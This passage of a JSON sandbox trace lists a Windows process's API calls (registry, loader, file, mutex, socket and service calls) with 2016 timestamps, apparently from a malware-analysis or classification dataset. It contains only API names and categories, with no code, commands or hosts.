"2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,323", "api": "NtOpenMutant"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,323", "api": "NtQueryInformationFile"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,323", "api": "NtOpenMutant"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,323", "api": "NtCreateMutant"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,323", "api": "NtOpenMutant"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetDllHandle"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,323", "api": "WSAStartup"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,323", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,333", "api": "NtQueryInformationFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "services", "timestamp": "2016-02-16 17:41:35,333", "api": "OpenSCManagerW"}, {"category": "services", "timestamp": "2016-02-16 17:41:35,333", "api": "OpenServiceW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "services", "timestamp": "2016-02-16 17:41:35,333", "api": "OpenSCManagerA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,343", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,343", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryInfoKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegEnumValueW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "NtQueryValueKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtSetInformationFile"}, {"category": "filesystem", 